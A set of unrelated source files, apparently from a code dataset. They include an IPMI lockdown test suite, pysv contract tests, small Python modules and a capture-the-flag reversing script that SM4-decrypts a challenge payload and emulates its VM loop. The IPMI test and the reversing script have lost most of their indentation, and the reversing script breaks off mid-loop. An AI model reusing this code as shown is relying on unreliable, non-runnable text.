    #    of all in-band ipmi commands in unlocked mode.
def runTest(self):
if not self.platform in ['habanero','firestone','garrison', 'p9dsu']:
raise unittest.SkipTest("Platform %s doesn't support IPMI Lockdown mode" % self.platform)
self.cv_SYSTEM.goto_state(OpSystemState.OS)
# Get OS level
l_oslevel = self.cv_HOST.host_get_OS_Level()
# Get kernel version
l_kernel = self.cv_HOST.host_get_kernel_version()
# Checking for ipmitool command and lm_sensors package
self.cv_HOST.host_check_command("ipmitool")
l_pkg = self.cv_HOST.host_check_pkg_for_utility(l_oslevel, "ipmitool")
print "Installed package: %s" % l_pkg
        # loading below ipmi modules based on config option
        # ipmi_devintf, ipmi_powernv and ipmi_msghandler
self.cv_HOST.host_load_module_based_on_config(l_kernel, BMC_CONST.CONFIG_IPMI_DEVICE_INTERFACE,
BMC_CONST.IPMI_DEV_INTF)
self.cv_HOST.host_load_module_based_on_config(l_kernel, BMC_CONST.CONFIG_IPMI_POWERNV,
BMC_CONST.IPMI_POWERNV)
self.cv_HOST.host_load_module_based_on_config(l_kernel, BMC_CONST.CONFIG_IPMI_HANDLER,
BMC_CONST.IPMI_MSG_HANDLER)
# Issue a ipmi lock command through authenticated interface
print "Issuing ipmi lock command through authenticated interface"
l_res = self.cv_IPMI.enter_ipmi_lockdown_mode()
        try:
            self.run_inband_ipmi_whitelisted_cmds()
        except Exception:
            l_msg = "One of the whitelisted in-band ipmi commands failed to execute"
            print l_msg
            print sys.exc_info()
finally:
# Issue a ipmi unlock command at the end of test.
print "Issuing ipmi unlock command through authenticated interface"
self.cv_IPMI.exit_ipmi_lockdown_mode()
##
# @brief This function will execute whitelisted in-band ipmi commands
# and test the functionality in locked mode.
def run_inband_ipmi_whitelisted_cmds(self):
l_con = self.cv_SYSTEM.sys_get_ipmi_console()
self.cv_SYSTEM.host_console_login()
self.cv_SYSTEM.host_console_unique_prompt()
l_con.run_command("uname -a")
# Test IPMI white listed commands those should be allowed through un-authenticated
# in-band interface
# 1.[App] Get Device ID
print "Testing Get Device ID command"
l_res = l_con.run_command(BMC_CONST.HOST_GET_DEVICE_ID)
# 2.[App] Get Device GUID
print "Testing Get Device GUID"
l_res = l_con.run_command(BMC_CONST.HOST_GET_DEVICE_GUID)
# 3.[App] Get System GUID
print "Testing Get system GUID"
l_res = l_con.run_command(BMC_CONST.HOST_GET_SYSTEM_GUID)
# 4.[Storage] Get SEL info
print "Testing Get SEL info"
l_res = l_con.run_command(BMC_CONST.HOST_GET_SEL_INFO)
# 5.[Storage] Get SEL time
print "Testing Get SEL time"
l_res = l_con.run_command(BMC_CONST.HOST_GET_SEL_TIME_RAW)
# 6. [Storage] Reserve SEL
print "Testing Reserve SEL"
l_res = l_con.run_command(BMC_CONST.HOST_RESERVE_SEL)
# 7. [Storage] Set SEL time (required for RTC)
print "Testing Set SEL time"
l_res = l_con.run_command(BMC_CONST.HOST_GET_SEL_TIME)
l_res = l_con.run_command(BMC_CONST.HOST_SET_SEL_TIME + " \'" + l_res[-1] + "\'")
l_con.run_command(BMC_CONST.HOST_GET_SEL_TIME)
# 8. [Transport] Get LAN parameters
print "Testing Get LAN parameters"
l_res = l_con.run_command(BMC_CONST.HOST_GET_LAN_PARAMETERS)
# 9.[Chassis] Get System Boot Options
print "Testing Get System Boot Options"
l_res = l_con.run_command(BMC_CONST.HOST_GET_SYSTEM_BOOT_OPTIONS)
# 10.[Chassis] Set System Boot Options
print "Testing Set System Boot Options"
l_res = l_con.run_command(BMC_CONST.HOST_SET_SYTEM_BOOT_OPTIONS)
l_con.run_command(BMC_CONST.HOST_GET_SYSTEM_BOOT_OPTIONS)
# 11. [App] Get BMC Global Enables
print "Testing Get BMC Global Enables"
l_res = l_con.run_command(BMC_CONST.HOST_GET_BMC_GLOBAL_ENABLES_RAW)
l_con.run_command(BMC_CONST.HOST_GET_BMC_GLOBAL_ENABLES)
# 12. [App] Set BMC Global Enables
print "Testing Set BMC Global Enables"
l_res = l_con.run_command(BMC_CONST.HOST_SET_BMC_GLOBAL_ENABLES_SEL_OFF)
l_con.run_command(BMC_CONST.HOST_GET_BMC_GLOBAL_ENABLES)
l_con.run_command(BMC_CONST.HOST_SET_BMC_GLOBAL_ENABLES_SEL_ON)
# 13.[App] Get System Interface Capabilities
if not self.platform in ['p9dsu']:
print "Testing Get System Interface Capabilities"
l_res = l_con.run_command(BMC_CONST.HOST_GET_SYSTEM_INTERFACE_CAPABILITIES_SSIF)
l_res = l_con.run_command(BMC_CONST.HOST_GET_SYSTEM_INTERFACE_CAPABILITIES_KCS)
# 14.[App] Get Message Flags
print "Testing Get Message Flags"
l_res = l_con.run_command(BMC_CONST.HOST_GET_MESSAGE_FLAGS)
# 15. [App] Get BT Capabilities
print "Testing Get BT Capabilities"
l_res = l_con.run_command(BMC_CONST.HOST_GET_BT_CAPABILITIES)
# 16. [App] Clear Message Flags
print "Testing Clear Message Flags"
l_res = l_con.run_command_ignore_fail(BMC_CONST.HOST_CLEAR_MESSAGE_FLAGS)
if not self.platform in ['p9dsu']:
# 17. [OEM] PNOR Access Status
print "Testing the PNOR Access Status"
l_res = l_con.run_command(BMC_CONST.HOST_PNOR_ACCESS_STATUS_DENY)
l_res = l_con.run_command(BMC_CONST.HOST_PNOR_ACCESS_STATUS_GRANT)
# 18. [Storage] Add SEL Entry
print "Testing Add SEL Entry"
print "Clearing the SEL list"
self.cv_IPMI.ipmi_sdr_clear()
l_res = l_con.run_command(BMC_CONST.HOST_ADD_SEL_ENTRY)
time.sleep(1)
l_res = self.cv_IPMI.last_sel()
print "Checking for Reserved entry creation in SEL"
print l_res
        if "eserved" not in l_res:  # matches both "Reserved" and "reserved"
            raise Exception("IPMI: Add SEL Entry command, doesn't create an SEL event")
# 19. [App] Set Power State
print "Testing Set Power State"
l_res = l_con.run_command(BMC_CONST.HOST_SET_ACPI_POWER_STATE)
# 20.[Sensor/Event] Platform Event (0x02)
print "Testing Platform Event"
self.cv_IPMI.ipmi_sdr_clear()
l_res = l_con.run_command(BMC_CONST.HOST_PLATFORM_EVENT)
l_res = self.cv_IPMI.last_sel()
if "eserved" not in l_res:
raise Exception("IPMI: Platform Event command failed to log SEL event")
# 21.[Chassis] Chassis Control
print "Testing chassis power on"
l_res = l_con.run_command(BMC_CONST.HOST_CHASSIS_POWER_ON)
# 22. [App] Get ACPI Power State (0x06)
print "Testing Get ACPI Power State"
l_res = l_con.run_command(BMC_CONST.HOST_GET_ACPI_POWER_STATE)
# 23. [App] Set watchdog
print "Testing Set watchdog"
l_res = l_con.run_command(BMC_CONST.HOST_SET_WATCHDOG)
self.cv_IPMI.mc_get_watchdog()
if self.platform in ['p9dsu']:
return
# 24. [Sensor/Event] Get Sensor Type
print "Testing Get Sensor Type"
l_res = self.cv_IPMI.sdr_get_watchdog()
matchObj = re.search( "Watchdog \((0x\d{1,})\)", l_res)
if matchObj:
print "Got sensor Id for watchdog: %s" % matchObj.group(1)
else:
raise Exception("Failed to get sensor id for watchdog sensor")
l_res = l_con.run_command(BMC_CONST.HOST_GET_SENSOR_TYPE_FOR_WATCHDOG + " " + matchObj.group(1))
# 25.[Sensor/Event] Get Sensor Reading
print "Testing Get Sensor Reading"
l_res = self.cv_IPMI.sdr_get_watchdog()
matchObj = re.search( "Watchdog \((0x\d{1,})\)", l_res)
if matchObj:
print "Got sensor Id for watchdog: %s" % matchObj.group(1)
else:
raise Exception("Failed to get sensor id for watchdog sensor")
l_res = l_con.run_command(BMC_CONST.HOST_GET_SENSOR_READING + " " + matchObj.group(1))
# 26. [OEM] PNOR Access Response (0x08)
print "Testing PNOR Access Response"
l_con.run_command(BMC_CONST.HOST_PNOR_ACCESS_STATUS_GRANT)
l_res = l_con.run_command(BMC_CONST.HOST_PNOR_ACCESS_RESPONSE)
l_con.run_command(BMC_CONST.HOST_PNOR_ACCESS_STATUS_DENY)
l_res = l_con.run_command(BMC_CONST.HOST_PNOR_ACCESS_RESPONSE)
# 27.[App] 0x38 Get Channel Authentication Cap
print "Testing Get Channel Authentication Capabilities"
l_res = l_con.run_command(BMC_CONST.HOST_GET_CHANNEL_AUTH_CAP)
# 28.[App] Reset Watchdog (0x22)
print "Testing reset watchdog"
self.cv_IPMI.ipmi_sdr_clear()
l_res = l_con.run_command(BMC_CONST.HOST_RESET_WATCHDOG)
l_res = ''
for x in range(0,25):
# Reset watchdog should create a SEL event log
print "# Looking for Watchdog SEL event try %d" % x
l_res = self.cv_IPMI.last_sel()
print l_res
if "Watchdog" in l_res:
break
time.sleep(1)
if "Watchdog" not in l_res:
raise Exception("IPMI: Reset Watchdog command, doesn't create an SEL event")
# Below commands will effect sensors and fru values and some care to be taken for
# executing.
# 29.[Storage] Write FRU
# 30.[Sensor/Event] Set Sensor Reading
# 31. [OEM] Partial Add ESEL (0xF0)
        # This is tested by the kernel itself; it will send messages to the BMC internally
# 32.[App] Send Message
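The sensor-ID parsing in steps 24/25 above leans on `re.search("Watchdog \((0x\d{1,})\)", ...)` against `ipmitool sdr` output. A standalone sketch of that pattern (the sample string here is made up, not real BMC output); note that `\d` only matches decimal digits, so an ID such as `0x0a` would slip through the original pattern, and a hex-aware variant is shown for comparison:

```python
import re

# Pattern as used above, plus a hex-aware variant.
sample = "Watchdog (0x07) | 0x00 | ok"
dec_pat = r"Watchdog \((0x\d+)\)"
hex_pat = r"Watchdog \((0x[0-9a-fA-F]+)\)"

m = re.search(dec_pat, sample)
print(m.group(1))  # -> 0x07

# "\d" misses hex letters: 0x0a does not match the decimal pattern.
assert re.search(dec_pat, "Watchdog (0x0a)") is None
assert re.search(hex_pat, "Watchdog (0x0a)").group(1) == "0x0a"
```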
d78d46855b1e8af013795bcd9ce42f63ccd57ab7 | 7,716 | py | Python | tests/test_contract.py | iwob/pysv | 6fdfb93d66cce84cceacabd3806f3f51f0cbbe17 | [
"MIT"
] | 2 | 2017-06-21T04:00:11.000Z | 2018-06-11T17:28:55.000Z | tests/test_contract.py | iwob/pysv | 6fdfb93d66cce84cceacabd3806f3f51f0cbbe17 | [
"MIT"
] | null | null | null | tests/test_contract.py | iwob/pysv | 6fdfb93d66cce84cceacabd3806f3f51f0cbbe17 | [
"MIT"
] | 1 | 2018-06-11T17:28:56.000Z | 2018-06-11T17:28:56.000Z | import unittest
from pysv.contract import *
class TestsContract(unittest.TestCase):
def test_program_vars_input_and_local(self):
vars = ProgramVars({'x': 'Int'}, {'y': 'Int'})
vars.add_marked_variables(["|x|'", "|y|'", "|y|''"])
self.assertEquals({'x': 'Int', "|x|'": 'Int'}, vars.input_vars)
self.assertEquals({'y': 'Int', "|y|'": 'Int', "|y|''": 'Int'}, vars.local_vars)
self.assertEquals({'x', "|x|'"}, set(vars.get_names_input()))
self.assertEquals({'y', "|y|'", "|y|''"}, set(vars.get_names_local()))
self.assertEquals({'x', "|x|'", 'y', "|y|'", "|y|''"}, set(vars.get_names_all()))
self.assertEquals({'x': 'Int', "|x|'": 'Int', 'y': 'Int', "|y|'": 'Int', "|y|''": 'Int'}, vars.all())
vars.add_input_variables(['a', 'b'], 'Bool')
self.assertEquals({'x': 'Int', "|x|'": 'Int', 'a': 'Bool', 'b': 'Bool'}, vars.input_vars)
vars.add_local_variables(['c'], 'Bool')
self.assertEquals({'y': 'Int', "|y|'": 'Int', "|y|''": 'Int', 'c': 'Bool'}, vars.local_vars)
vars.rename_var('c', 'c_T1')
self.assertEquals({'y': 'Int', "|y|'": 'Int', "|y|''": 'Int', 'c_T1': 'Bool'}, vars.local_vars)
def test_program_vars_markers(self):
vars = ProgramVars({'x':'Int'}, {"y":"Int", "|y''|":"Int", "|asd'''''|":"Double", "|y'|":"Int"})
self.assertEquals("|y''|", vars.get_latest_var_name('y'))
def test_formula_test_case_border_cases(self):
self.assertRaises(Exception, formula_test_case_py, [], [])
self.assertRaises(Exception, formula_test_case_py, ['A'], [])
self.assertRaises(Exception, formula_test_case_py, [], ['B'])
def test_formula_test_case(self):
formula = formula_test_case_py(['A'], ['C'])
expected = "((not (A)) or (C))"
self.assertEquals(expected, formula)
formula = formula_test_case_py(['A', 'B'], ['C', 'D'])
expected = "(((not (A)) or (not (B))) or ((C) and (D)))"
self.assertEquals(expected, formula)
def test_formula_test_cases_1(self):
p1 = (['x>0'], ['res==5 and y<0'])
formula = formula_test_cases_py([p1])
expected = "((not (x>0)) or (res==5 and y<0))"
self.assertEquals(expected, formula)
def test_formula_test_cases_2(self):
p1 = (['A', 'B'], ['x == 8', 'y == 0'])
p2 = (['A', 'C'], ['x == 5', 'y == 1'])
p3 = (['D', 'B'], ['x == 8', 'y == 2'])
formula = formula_test_cases_py([p1, p2, p3])
expected = "(((not (A)) or (not (B))) or ((x == 8) and (y == 0))) and (((not (A)) or (not (C))) or ((x == 5) and (y == 1))) and (((not (D)) or (not (B))) or ((x == 8) and (y == 2)))"
self.assertEquals(expected, formula)
def test_program_vars_static_methods(self):
vars = {'x': 'Int', 'y': 'Int', 'z': 'Bool', 'a': 'Real'}
self.assertEquals({'Int', 'Bool', 'Real'}, ProgramVars.get_types(vars))
self.assertEquals({'x': 'Int', 'y': 'Int'}, ProgramVars.get_vars_of_type(vars, 'Int'))
self.assertEquals({'z': 'Bool'}, ProgramVars.get_vars_of_type(vars, 'Bool'))
self.assertEquals({'a': 'Real'}, ProgramVars.get_vars_of_type(vars, 'Real'))
self.assertEquals({}, ProgramVars.get_vars_of_type(vars, 'String'))
def test_Test_class(self):
test = Test([1, 2], [3, -1], ['x', 'y'], ['add', 'sub'])
self.assertEquals([1, 2], test.inputs)
self.assertEquals([3, -1], test.outputs)
self.assertEquals("(x == 1) and (y == 2)", test.code_inputs(lang=utils.LANG_PYTHON))
self.assertEquals("(add == 3) and (sub == -1)", test.code_outputs(lang=utils.LANG_PYTHON))
self.assertEquals("(and (= x 1) (= y 2))", test.code_inputs(lang=utils.LANG_SMT2))
self.assertEquals("(and (= add 3) (= sub -1))", test.code_outputs(lang=utils.LANG_SMT2))
def test_Test_formulaic_form_py(self):
t = Test([1, 2], [3, -1], ['x', 'y'], ['add', 'sub'])
self.assertEquals(['x == 1', 'y == 2'], Test.formulaic_form(t.inputs, t.in_vars, lang=utils.LANG_PYTHON))
self.assertEquals(['add == 3', 'sub == -1'], Test.formulaic_form(t.outputs, t.out_vars, lang=utils.LANG_PYTHON))
self.assertEquals(['(= x 1)', '(= y 2)'], Test.formulaic_form(t.inputs, t.in_vars, lang=utils.LANG_SMT2))
self.assertEquals(['(= add 3)', '(= sub -1)'], Test.formulaic_form(t.outputs, t.out_vars, lang=utils.LANG_SMT2))
def test_TestF_class(self):
t = TestF([1, 2], ['add < sub', 'sub >= 0'], ['x', 'y'], ['add', 'sub'])
self.assertEquals([1, 2], t.inputs)
self.assertEquals(['add < sub', 'sub >= 0'], t.outputs)
self.assertEquals("(x == 1) and (y == 2)", t.code_inputs(lang=utils.LANG_PYTHON))
self.assertEquals("(add < sub) and (sub >= 0)", t.code_outputs(lang=utils.LANG_PYTHON))
self.assertEquals("(and (= x 1) (= y 2))", t.code_inputs(lang=utils.LANG_SMT2))
self.assertEquals("(and add < sub sub >= 0)", t.code_outputs(lang=utils.LANG_SMT2))
def test_TestFF_class(self):
t = TestFF(['x == 1', 'y == 2'], ['add < sub', 'sub >= 0'], ['x', 'y'], ['add', 'sub'])
self.assertEquals(['x == 1', 'y == 2'], t.inputs)
self.assertEquals(['add < sub', 'sub >= 0'], t.outputs)
self.assertEquals("(x == 1) and (y == 2)", t.code_inputs(lang=utils.LANG_PYTHON))
self.assertEquals("(add < sub) and (sub >= 0)", t.code_outputs(lang=utils.LANG_PYTHON))
self.assertEquals("(and x == 1 y == 2)", t.code_inputs(lang=utils.LANG_SMT2))
self.assertEquals("(and add < sub sub >= 0)", t.code_outputs(lang=utils.LANG_SMT2))
def test_TestCases_class_py(self):
tests = [Test([0, 2], [2]),
Test([1, 2], [3]),
Test([1, 3], [4])]
tc = TestCases(tests, in_vars=['x', 'y'], out_vars=['res'], lang=utils.LANG_PYTHON)
self.assertEquals([0, 2], tc.tests[0].inputs)
self.assertEquals([1, 2], tc.tests[1].inputs)
self.assertEquals([2], tc.tests[0].outputs)
self.assertEquals([3], tc.tests[1].outputs)
self.assertEquals('(not ((x == 0) and (y == 2)) or (res == 2)) and ' +\
'(not ((x == 1) and (y == 2)) or (res == 3)) and ' +\
'(not ((x == 1) and (y == 3)) or (res == 4))',
tc.code_postcond())
tests = [TestFF(['A', 'B'], ['C'])]
tc = TestCases(tests, in_vars=['x', 'y'], out_vars=['res'], lang=utils.LANG_PYTHON)
self.assertEquals('(not ((A) and (B)) or (C))',
tc.code_postcond())
tests = []
tc = TestCases(tests, in_vars=['x', 'y'], out_vars=['res'], lang=utils.LANG_PYTHON)
self.assertEquals('', tc.code_postcond())
def test_TestCases_class_smt2(self):
tests = [Test([0, 2], [2]),
Test([1, 2], [3]),
Test([1, 3], [4])]
test_cases = TestCases(tests, in_vars=['x', 'y'], out_vars=['res'], lang=utils.LANG_SMT2)
self.assertEquals('(and (=> (and (= x 0) (= y 2)) (= res 2)) ' +\
'(=> (and (= x 1) (= y 2)) (= res 3)) ' +\
'(=> (and (= x 1) (= y 3)) (= res 4))' +\
')',
test_cases.code_postcond())
tests = [TestFF(['A', 'B'], ['C'])]
tc = TestCases(tests, in_vars=['x', 'y'], out_vars=['res'], lang=utils.LANG_SMT2)
self.assertEquals('(=> (and A B) C)',
tc.code_postcond())
tests = []
tc = TestCases(tests, in_vars=['x', 'y'], out_vars=['res'], lang=utils.LANG_SMT2)
        self.assertEquals('', tc.code_postcond())
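The expected strings in these tests encode an implication `pre => post` as "not(all preconditions) or (all postconditions)". A minimal re-implementation consistent with the expected values above (a sketch inferred from the test fixtures, not the library's actual `formula_test_case_py` code):

```python
def implication_formula(pre, post):
    """Render pre => post as a Python boolean expression string,
    following the parenthesisation seen in the expected test strings."""
    if not pre or not post:
        raise ValueError("need at least one pre- and one postcondition")
    lhs = "(not (%s))" % pre[0]
    for p in pre[1:]:
        lhs = "(%s or (not (%s)))" % (lhs, p)
    rhs = "(%s)" % post[0]
    for q in post[1:]:
        rhs = "(%s and (%s))" % (rhs, q)
    return "(%s or %s)" % (lhs, rhs)

print(implication_formula(['A'], ['C']))
# -> ((not (A)) or (C))
```

This reproduces both expected strings from `test_formula_test_case` above, including the asymmetric wrapping of single vs. multiple conditions.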
# ==== file: egtaonline/__init__.py | repo: egtaonline/egtaonline-api | license: Apache-2.0 ====
"""Module for egta online api"""
__version__ = '0.8.7'
# ==== file: tests/test/search/test_references_searcher_db_files.py | repo: watermelonwolverine/fvttmv | license: MIT ====
from fvttmv.search.__references_searcher_db_files import ReferencesSearcherDbFiles
from test.common import TestCase, AbsPaths, References
class ReferencesSearcherDbFilesTest(TestCase):
def test_search_for_references_in_db_files1(self):
print("test_search_for_references_in_db_files1")
expected = []
result = ReferencesSearcherDbFiles.search_for_references_in_db_files(AbsPaths.Data,
[], # TODO test: additional targets
"does/not/exist")
self.assertEqual(result, expected)
def test_search_for_references_in_db_files2(self):
print("test_search_for_references_in_db_files2")
expected = [AbsPaths.contains_1_db,
AbsPaths.contains_1_and_2_db]
result = ReferencesSearcherDbFiles.search_for_references_in_db_files(AbsPaths.Data,
[], # TODO test: additional targets
References.file1_original)
self.assertEqual(expected, result)
# ==== file: graph_explorer/structured_metrics/plugins/vmstat.py | repo: farheenkaifee/dashboard_3 | license: Apache-2.0 ====
from . import Plugin
class VmstatPlugin(Plugin):
targets = [
{
            'match': r'^servers\.(?P<server>[^\.]+)\.vmstat\.(?P<type>.*)$',
'target_type': 'rate',
'tags': {'unit': 'Page'}
}
]
def sanitize(self, target):
target['tags']['type'] = target['tags']['type'].replace('pgpg', 'paging_')
target['tags']['type'] = target['tags']['type'].replace('pswp', 'swap_')
# vim: ts=4 et sw=4:
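The `sanitize` method above rewrites raw vmstat counter names into friendlier tag values. A quick standalone check of the two substitutions (the shape of the `target` dict is assumed from the plugin code above):

```python
def sanitize(target):
    # Same two substitutions as VmstatPlugin.sanitize above.
    target['tags']['type'] = target['tags']['type'].replace('pgpg', 'paging_')
    target['tags']['type'] = target['tags']['type'].replace('pswp', 'swap_')

t = {'tags': {'type': 'pgpgin'}}
sanitize(t)
print(t['tags']['type'])  # -> paging_in

t2 = {'tags': {'type': 'pswpout'}}
sanitize(t2)
print(t2['tags']['type'])  # -> swap_out
```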
# ==== file: app/auth/__init__.py | repo: Muxi-Studio/ccnu-network-culture-festival | license: MIT ====
# coding: utf-8
from flask import Blueprint
auth = Blueprint(
'auth',
__name__,
    template_folder='templates',
    static_folder='static'
)
from . import views, forms
# ==== file: dentexchange/apps/location/tests/test_zip_code.py | repo: hellhound/dentexchange | license: BSD-3-Clause ====
# -*- coding:utf-8 -*-
import unittest
import mock
import decimal
from ..models import ZipCode
class ZipCodeTestCase(unittest.TestCase):
def test_unicode_should_return_code(self):
# setup
model = ZipCode()
code = '1.0'
model.code = decimal.Decimal(code)
# action
returned_value = unicode(model)
# assert
self.assertEqual(code, returned_value)
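The test above is Python 2 (`unicode(model)`); under Python 3 the equivalent check targets `__str__` via `str()`. A toy class standing in for the Django `ZipCode` model (hypothetical, for illustration only):

```python
import decimal

class ZipCode:
    """Stand-in for the model: string conversion returns the code."""
    code = None

    def __str__(self):
        return str(self.code)

# Mirrors the test body above, with str() in place of unicode().
model = ZipCode()
code = '1.0'
model.code = decimal.Decimal(code)
print(str(model))  # -> 1.0
```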
# ==== file: app/services/bgm_tv/bgm_tv.py | repo: renovate-tests/pol | license: MIT ====
from typing import Optional
import requests
from app.core import config
from app.services.bgm_tv.model import UserInfo, SubjectWithEps
class BgmApi:
def __init__(self, mirror=False):
self.session = requests.Session()
if mirror:
self.host = "mirror.api.bgm.rin.cat"
self.session.headers["user-agent"] = config.REQUEST_SERVICE_USER_AGENT
else:
self.host = "api.bgm.tv"
self.session.headers["user-agent"] = config.REQUEST_USER_AGENT
def url(self, path):
return f"https://{self.host}{path}"
@staticmethod
def error_in_response(data: dict):
return "error" in data
def subject_eps(self, subject_id: int) -> Optional[SubjectWithEps]:
r = self.session.get(self.url(f"/subject/{subject_id}/ep")).json()
if self.error_in_response(r):
return None
return SubjectWithEps.parse_obj(r)
def get_user_info(self, user_id: str) -> Optional[UserInfo]:
r = self.session.get(self.url(f"/user/{user_id}")).json()
if self.error_in_response(r):
return None
return UserInfo.parse_obj(r)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.session.close()
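`BgmApi` implements the context-manager protocol so its HTTP session is closed on exit. The same pattern in isolation, with a toy session object so no network is involved (all names here are illustrative, not from the real module):

```python
class FakeSession:
    """Toy stand-in for requests.Session, tracking close()."""
    def __init__(self):
        self.closed = False

    def close(self):
        self.closed = True

class Client:
    def __init__(self):
        self.session = FakeSession()

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.session.close()

with Client() as c:
    assert not c.session.closed  # still open inside the with-block
# On leaving the block, __exit__ has closed the session.
print(c.session.closed)  # -> True
```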
# ==== file: tests/test_invoke.py | repo: avara1986/ardy | license: Apache-2.0 ====
# coding=utf-8
# python imports
from __future__ import unicode_literals, print_function, absolute_import
import os
import unittest
from ardy.core.invoke import Invoke
TESTS_PATH = os.path.dirname(os.path.abspath(__file__))
class InvokeTest(unittest.TestCase):
EXAMPLE_PROJECT = "myexamplelambdaproject"
def setUp(self):
pass
def test_init(self):
invoke = Invoke(path=TESTS_PATH)
invoke.run("LambdaExample1")
if __name__ == '__main__':
unittest.main()
# ==== file: Step4/04_reversing_bis.py | repo: Aterwyn/SSTIC2019 | license: MIT ====
from SM4 import SM4
input_data = "a1a2a3a4a5a6a7a8a9aaabacadaeafa0b1b2b3b4b5b6b7b8b9babbbcbdbebfb0"
input_data = "acadaa8b5b55306fb3c6dfc3b2d1c80770084644225febd71a9189aa26ec740e"
#input_data = "0000000000000000000000000000000000000000000000000000000000000000"
global input_list
input_list = bytearray.fromhex(input_data)
global data
data = [0]*16
#plain data, written in little-endian
#const0 = bytearray.fromhex("08251587e988e8de")[::-1] + bytearray.fromhex("5fa89078ee10390f")[::-1]
#const1 = bytearray.fromhex("d73f7a649d78f7f4")[::-1] + bytearray.fromhex("f556dc27813a05a1")[::-1]
const0 = bytearray.fromhex("6766722e612e7270")[::-1] + bytearray.fromhex("2e76662e666e632e")[::-1]
const1 = bytearray.fromhex("6640727976706e73")[::-1] + bytearray.fromhex("7465622e70766766")[::-1]
const2 = input_list[:0x10]
const3 = input_list[0x10:]
global sm4_data
sm4_data = const0 + const1 + const2 + const3 + bytearray.fromhex("00000000")
#0 encrypted
def print_sm4_data():
global sm4_data
print("")
for i in range(4):
print("0x" + sm4_data[i*0x10:i*0x10+8][::-1].hex() + " 0x" + sm4_data[i*0x10+8:(i+1)*0x10][::-1].hex())
def print_data():
global data
print("")
for i in range(0,16,4):
print("%08x %08x %08x %08x" % (data[i], data[i+1], data[i+2], data[i+3]))
#0x100000: 08251587e988e8de 5fa89078ee10390f
#0x100010: d73f7a649d78f7f4 f556dc27813a05a1
#0x100020: a8a7a6a5a4a3a2a1 a0afaeadacabaaa9
#0x100030: b8b7b6b5b4b3b2b1 b0bfbebdbcbbbab9
print_sm4_data()
f = open("decrypted_file",'rb')
global read
read = f.read()
f.close()
payload_offset = 0x4dbd8
read = read[payload_offset: payload_offset+0x101010]
def get_value_from_adr(adr):
global sm4_data, read
if adr >= 0x100000:
offset = adr-0x100000
return int(sm4_data[offset:offset+4][::-1].hex(),16)
else:
sm4 = SM4()
base_adr = adr&0xFFFFF0
#debug
#mod_adr = base_adr+0x1000
mod_adr = base_adr
base_offset = adr&0xF
data = read[mod_adr:mod_adr+0x10]
data2 = read[mod_adr+0x10: mod_adr+0x20]
dec_data1 = sm4.decrypt(base_adr, data)
sm4 = SM4()
dec_data2 = sm4.decrypt(base_adr+0x10, data2)
dec_data = dec_data1 + dec_data2
return int(dec_data[base_offset:base_offset+4][::-1].hex(), 16)
def insert_value_at_adr(val_int, adr):
global sm4_data
    assert 0x100000 <= adr <= 0x100040
#0159: insert 0x22926dbf (data[0x00]) at adr 0x100020 (adr pointed by data[0x0d]) <<<<
val_hex = (val_int).to_bytes(4, byteorder="little")
off = adr-0x100000
#print("%08x" % val_int)
#print(val_hex.hex())
#print("before: " + sm4_data.hex())
sm4_data = sm4_data[:off] + val_hex + sm4_data[off+4:]
#print(sm4_data.hex())
#print("offset: " + str(off))
#print("after : " + sm4_data.hex())
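`insert_value_at_adr` above serialises a 32-bit word into the SM4 state buffer in little-endian order, and `get_value_from_adr` reads it back by reversing a 4-byte slice before parsing it as hex. The round trip can be checked in isolation (the sample value is the one from the comment in `insert_value_at_adr`):

```python
# Little-endian pack, as in insert_value_at_adr.
val = 0x22926dbf
packed = val.to_bytes(4, byteorder="little")
print(packed.hex())  # -> bf6d9222

# Unpack, as in get_value_from_adr: reverse the slice, parse as hex.
unpacked = int(packed[::-1].hex(), 16)
print(hex(unpacked))  # -> 0x22926dbf
```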
def loop():
data[0x04] = 0x0010
data[0x04] = data[0x04] << 0x0010
data[0x04] += 0x0020 #data[0x04] = 0x100020 #input
data[0x0d] = 0x0010
data[0x0d] = data[0x0d] << 0x0010
data[0x0d] += 0x0020 #data[0x0d] = 0x100020 #input
data[0x0c] = 0x0004
#Z1Z2Z3Z4Z5Z6Z7Z8Z9ZAZBZCZDZEZFZ0
#Y1Y2Y3Y4Y5Y6Y7Y8Y9YAYBYCYDYEYFY0
while (data[0xc] != 0): #counter C on 4
data[0x00] = get_value_from_adr(data[0x04])
data[0x00] = data[0x00] << 0x0010 & 0xFFFFFFFF
data[0x00] = data[0x00] >> 0x0010 #data[0x00] = 0 0 Z2 Z1
data[0x00] = (data[0x00]>>8) + ((data[0x00] & 0xff)<<8) #data[0x00] = 0 0 Z1 Z2
data[0x04] += 0x0002 #data[0x04] = 0x100022
data[0x01] = get_value_from_adr(data[0x04])
data[0x01] = data[0x01] << 0x0010 & 0xFFFFFFFF
data[0x01] = data[0x01] >> 0x0010
data[0x01] = (data[0x01]>>8) + ((data[0x01] & 0xff)<<8) #data[0x01] = 0 0 Z3 Z4
data[0x04] += 0x0002 #data[0x04] = 0x100024
data[0x02] = get_value_from_adr(data[0x04])
data[0x02] = data[0x02] << 0x0010 & 0xFFFFFFFF
data[0x02] = data[0x02] >> 0x0010
data[0x02] = (data[0x02]>>8) + ((data[0x02] & 0xff)<<8) #data[0x02] = 0 0 Z5 Z6
data[0x04] += 0x0002 #data[0x04] = 0x100026
data[0x03] = get_value_from_adr(data[0x04])
data[0x03] = data[0x03] << 0x0010 & 0xFFFFFFFF
data[0x03] = data[0x03] >> 0x0010
data[0x03] = (data[0x03]>>8) + ((data[0x03] & 0xff)<<8) #data[0x03] = 0 0 Z7 Z8
data[0x0e] = 0x0020
data[0x07] = 0x0007 #data[0x07] = 7
"""
#first time
data[0x00] = 0 0 Z1 Z2
data[0x01] = 0 0 Z3 Z4
data[0x02] = 0 0 Z5 Z6
data[0x03] = 0 0 Z7 Z8
data[0x07] = 7
#second time
data[0x00] = 0 0 X4 X3 0 0 Y1 Y2
data[0x01] = 0 0 0 20 ^ 0 0 X4 X3 ^ 0 0 Z5 Z6 0 0 Y3 Y4
data[0x02] = 0 0 Z7 Z8 0 0 Y5 Y6
data[0x03] = 0 0 Z1 Z2 0 0 Y7 Y8
data[0x07] = 3
#third time
"""
print("%08x %08x %08x %08x" % (data[0], data[1], data[2], data[3]))
print("\n\n")
print("0")
#print_data()
#print_sm4_data()
security = 0
while(data[0x0e] != 0): #counter E on 32
data[0x0e] -= 1 #decrement data[0x0e]-=1 = 0x1f decrement data[0x0e]-=1 =0x1e
